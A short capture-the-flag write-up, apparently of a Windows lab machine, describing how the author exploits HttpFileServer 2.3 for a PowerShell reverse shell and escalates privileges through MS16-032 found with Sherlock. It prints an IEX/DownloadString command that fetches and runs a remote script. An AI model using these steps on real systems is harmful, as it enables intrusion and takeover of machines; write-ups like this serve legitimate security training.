Table of contents
- Enumerate Vulnerable version of file server
- Exploit vulnerability to pop powershell…shell
- Escalate privileges with MS01632
Before my nmap scan was even done I found something interesting in the home page.
I am able to see that the service running on port 80 is a server “HttpFileServer 2.3”.
I do a searchsploit of HttpFileServer 2.3 and find exactly what I was looking for.
In order for the exploit to work you need to give the target server a command to run.
I chose Invoke-PowershellTCP.ps1 and I had to edit it in order to allow the script to run a reverse shell
Then after running the exploit and setting up our nc listener/ local python server(I renamed Invoke reverse shell to mini-reverse.ps1 on accident)
Annnnd we get some access
Privilege Escalation:
Going through the motions with privesc for a Windows box, I start out with a simple systeminfo command to see what I’m working with.
From here in order to automate the privesc search process I downloaded from my local python server, Sherlock, written by RastaMouse.
PS C:\Users\kostas\Desktop> IEX (New-Object Net.WebClient).DownloadString('')
Runnning Sherlock the system appears vulnerable to the following:
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link :
VulnStatus : Appears Vulnerable
I used powershell empire’s MS01632 exploit to automate this process and was able to get root
Overall, I found the privesc portion of this box very useful!